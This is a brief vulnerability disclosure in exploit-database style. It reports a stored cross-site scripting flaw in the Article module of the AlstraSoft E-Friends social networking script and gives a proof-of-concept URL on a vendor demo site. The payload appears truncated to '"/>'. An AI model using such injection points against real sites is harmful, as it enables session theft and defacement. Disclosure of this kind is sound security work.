# Exploit Title: AlstraSoft E-Friends Social Networking Script Stored XSS # Date: 2011 # Author: Eyup CELIK # Version: All Version # Tested on: All versions are Vulnerability ISSUE Cross Site Scripting can be done using the command input Vulnerable Page: Article Modules Exploit: "/> POC: http://www.alstrahost.com/friends/index.php?mode=article&pro=arch Thanks, Eyup CELIK Bilgi Teknolojileri Güvenlik Uzmani http://www.eyupcelik.com.tr